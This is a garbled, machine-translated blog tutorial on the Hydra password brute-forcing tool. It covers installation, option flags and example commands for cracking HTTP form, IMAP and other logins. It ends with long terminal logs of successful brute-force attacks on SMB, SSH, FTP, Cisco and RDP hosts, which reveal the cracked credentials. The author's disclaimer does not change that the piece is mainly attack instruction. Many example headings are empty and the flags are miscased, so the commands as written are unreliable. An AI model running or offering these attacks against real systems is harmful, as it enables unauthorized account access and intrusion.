Go Linux Brute force password cracking tool Hydra detailed

excerpt from: http://linzhibin824.blog.163.com/blog/static/735577102013144223127/

This brute force password cracking tool is quite powerful, supporting the online password cracking of almost all protocols, the key to whether the password can be cracked is whether the dictionary is strong enough. For social engineering infiltration, sometimes you can get a multiplier effect. This article only discusses the test from the security angle, uses the content of this article to do the destruction, has nothing to do with me.

First, Introduction

Hydra is a well-known hacker organization THC Open-source brute force password cracking tool, can hack a variety of passwords online. Official website: Http://www.thc.org/thc-hydra, can support AFP, Cisco AAA, Cisco Auth, Cisco Enable, CVS, Firebird, FTP, Http-form-get, Http-form -post, Http-get, Http-head, Http-proxy, Https-form-get, Https-form-post, Https-get, Https-head, HTTP-PROXY, ICQ, IMAP, IR C, LDAP, Ms-sql, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, Pc-anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rl Ogin, Rsh, Sap/r3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, TeamSpeak (TS2), Telnet, vmware-a Uth, VNC and XMPP type passwords.

Second, installation (Http://www.aldeid.com/wiki/Thc-hydra)

Dependencies

Package

Name	Lib
Xhydra (GUI)		sudo apt-get install pkg-config Libgtk2.0-dev
Openssl	Libssl/ssl.h	sudo apt-get install Libssl-dev
Postgres	Libpq.so	sudo apt-get install Libpq-dev
SVN (Subversion)	Libsvn_client-1, libapr-1.so, libaprutil-1.so	sudo apt-get install Libsvn-dev libapr1-dev Libaprutil1-dev
Firebird	Libfbclient.so	sudo apt-get install Firebird2.1-dev
MySQL Client	Libmysqlclient.so	sudo apt-get install Libmysqlclient-dev
AFP	Libafpclient.so	N/A
Ncp	Libncp.so, Nwcalls.h	sudo apt-get install Libncp-dev
Sap/r3	Librfc/saprfc.h	(See Http://www.sdn.sap.com/irj/sdn/linux)
Libssh	Libssh/libssh.h	sudo apt-get install Libssh-dev

In the case of Debian and Ubuntu distributions, the source comes with Hydra, which is installed directly with Apt-get online:

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev Libpq-dev Libsvn-dev Firebird2.1-dev Libncp-dev Hydra

Redhat/fedora release version of the download source package compiled installation, first install the relevant dependency package:

Hydra: http://www.thc.org/releases/hydra-7.4.2.tar.gz

The GUI graphical interface is supported by Hydra, but it is customary to use commands.

three, parameter descriptionHydra [[[-L LOGIN|-L file] [-P pass|-p file] | [-c FILE]] [-e NS][-o file] [-t tasks] [-M file [-t tasks]] [-w time] [-f] [-s PORT] [-S] [-VV] Server service [OPT]-R continues to crack from the last progress. -S uses SSL links. -S Port allows you to specify a nondefault port with this parameter. - L LOGIN Specifies the cracked user to crack for a specific user. -L FILE Specifies the user name dictionary. - p PASS lowercase, specify password cracking, less use, usually using a password dictionary. -P FILE uppercase, specifying the password dictionary. -e ns optional option, N: null password heuristic, s: Use specified user and password heuristics. -C FILE uses a colon-delimited format, such as "Login: password" instead of the-l/-p parameter. -M file specifies a single line of target list files. -o file specifies the result output files. - F after using the-m parameter, find the first pair of login or password to stop the crack. The number of threads running concurrently with-T TASKS, which defaults to 16. - w Time sets the maximum timeout, in seconds, which is 30s by default. -V/-V displays detailed procedures. Server target ipservice Specifies the service name, supported services and protocols: Telnet FTP POP3[-NTLM] IMAP[-NTLM] SMB smbnt Http-{head|get} http-{get|post}-form Http-proxy Cisco cisco-enable VNC ldap2 ldap3 MSSQL mysql oracle-listener postgres NNTP socks5 rexec rlogin pcnfs SNMP rsh CVS svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak SIP VMAUTHD Firebird NCP AFP et cetera. opt selectable optionsIv. Examples

1. hack ssh:

2. hack ftp:

3, get the way to submit, crack Web login:

HYDRA-L User name-p password Dictionary-t thread-vv-e NS IP http-get/admin/
HYDRA-L User name-p password Dictionary-t thread-vv-e ns-f IP http-get/admin/index. Php

4, post method submission, crack Web login:

HYDRA-L User name-p password Dictionary-s-IP http-post-form "/admin/login.php:username=^user^&password=^pass^&submit=login: Sorry password "  

(parameter description:-T simultaneous thread number 3,-L username is admin, dictionary pass.txt, save as Out.txt,-f when cracked a password on stop, 10.36.16.18 target IP, Http-post-form means that the hack is a form password cracking,<title> that is submitted using the HTTP POST method, which is the return information hint that represents the error guess. ）

5, crack https:

6, Crack TeamSpeak:

7. Crack Cisco:

8, crack SMB:

9, crack POP3:

10. Break RDP:

11, Crack Http-proxy:

12. hack IMAP:

Hydra-l user.txt-p Secret 10.36.16.18 IMAP PLAIN hydra-c defaults.txt-6 Imap://[fe80::2c:31ff:fe12:ac11]:143/plain

 

Measured as follows:

[email protected]:~# hydra-l administrator-p a.txt-t 10-vv 10.148.149.253 SMB Hydra v7.1 (c) by Van Hauser/thc & David maciejak-for legal purposes onlyHydra (Http://www.thc.org/thc-hydra) starting at 2013-02-03 23:56:32[INFO] Reduced number of tasks to 1 (SMB does don't like parallel connections)[DATA] 1 task, 1 server, 4 login tries (L:1/p:4), ~ tries per task[DATA] attacking service SMB on port 445[VERBOSE] resolving addresses ... done[attempt] target 10.148.149.253-login "Administrator"-Pass "root"-1 of 4 [child 0][VERBOSE] Accntflag is 2[VERBOSE] Hashflag is 2[VERBOSE] attempting Win2K Native mode.Server requested ENCRYPTED password without security signatures.Server Machine name:svctag-b9hr53xServer Primary Domain:workgroupattempting NTLM password authentication.Set NBSS Header length:87Set byte count:00smbsessionret:0100006d smberr:006d smbaction:01[attempt] target 10.148.149.253-login "Administrator"-Pass "Amgroup"-2 of 4 [child 0][VERBOSE] attempting Win2K Native mode.Server requested ENCRYPTED password without security signatures.Server Machine name:svctag-b9hr53xServer Primary Domain:workgroupattempting NTLM password authentication.Set NBSS Header length:87Set byte count:00smbsessionret:00000000 smberr:0000 smbaction:00 [445][SMB] host:10.148.149.253 login:administrator password:amgroup[STATUS] attack finished for 10.148.149.253 (waiting for children to finish)1 of 1 target successfuly completed, 1 valid password foundHydra (Http://www.thc.org/thc-hydra) finished at 2013-02-03 23:56:32 [Email protected]:~# hydra-l admin-p wordlis.txt-t 10.148.149.115 sshHydra v7.1 (c) by Van Hauser/thc & David Maciejak-for legal purposes Onlyhydra (Http://www.thc.org/thc-hydra) St Arting at 2013-02-04 00:45:18[data] 1 server, 2107 login tries (l:1/p:2107), tries per Task[data] attacking Service SSH on port 22[status] 942.00 tries/min, 942 tries in 00:01h, 1165 todo in 00:02h[status] 893.50 tries/min, 1787 t Ries in 00:02h, the 00:01h todo in [22][ssh] host:10.148.149.115 login:admin password:admin[STATUS] attack finished for 10.148.149.115 (waiting for children to finish) 1 of 1 target successfuly completed, 1 valid p Assword Foundhydra (Http://www.thc.org/thc-hydra) finished at 2013-02-04 00:47:43 [email protected]:~# hydra-l amgroup-p a.txt-t 10-vv 10.148.149.241 ftpHydra v7.1 (c) by Van Hauser/thc & David Maciejak-for legal purposes Onlyhydra (Http://www.thc.org/thc-hydra) St Arting at 2013-02-04 00:04:08[verbose] More tasks defined than login/pass pairs exist. Tasks reduced to 4. [DATA] 4 tasks, 1 server, 4 login tries (L:1/p:4), try per Task[data] attacking service FTP on port 21[verbose] Resolvi NG addresses ... done[attempt] target 10.148.149.241-login "Amgroup"-pass "root"-1 of 4 [child 0][attempt] Target 10 .148.149.241-login "Amgroup"-Pass "Amgroup"-2 of 4 [child 1][attempt] Target 10.148.149.241-login "Amgroup"-Pass "Admin"-3 of 4 [child 2][attempt] Target 10.148.149.241-login "Amgroup"-Pass "flow"-4 of 4 [child 3] [21][ftp] host:10.148.149.241 login:amgroup password:amgroup[STATUS] attack finished for 10.148.149.241 (waiting for children to finish) 1 of 1 target successfuly completed, 1 valid p Assword Foundhydra (Http://www.thc.org/thc-hydra) finished at 2013-02-04 00:04:14 [email protected]:~# hydra-p a.txt 10.148.149.254 CiscoHydra v7.1 (c) by Van Hauser/thc & David Maciejak-for legal purposes Onlyhydra (Http://www.thc.org/thc-hydra) St Arting at 2013-02-04 00:12:53warning:you should set the number of parallel task to 4 for Cisco services. [DATA] 4 tasks, 1 server, 4 login tries (l:1/p:4), to try per Task[data] attacking service Cisco on Port 23 [23][cisco] host:10.148.149.254 login:password:amgroup[STATUS] attack finished for 10.148.149.254 (waiting for children to finish) 1 of 1 target successfuly completed, 1 valid p Assword Foundhydra (Http://www.thc.org/thc-hydra) finished at 2013-02-04 00:12:53

[email protected]:~# hydra-l administrator-p a.txt-t 1 10.148.149.200 RDP Hydra v7.1 (c) by Van Hauser/thc & David maciejak-for legal purposes onlyHydra (Http://www.thc.org/thc-hydra) starting at 2013-02-04 00:20:38[DATA] 1 task, 1 server, 4 login tries (L:1/p:4), ~ tries per task[DATA] attacking service RDP on port 3389 [3389][RDP] host:10.148.149.200 login:administrator password:amgroup[STATUS] attack finished for 10.148.149.200 (waiting for children to finish)1 of 1 target successfuly completed, 1 valid password foundHydra (Http://www.thc.org/thc-hydra) finished at 2013-02-04 00:20:41

Go Linux Brute force password cracking tool Hydra detailed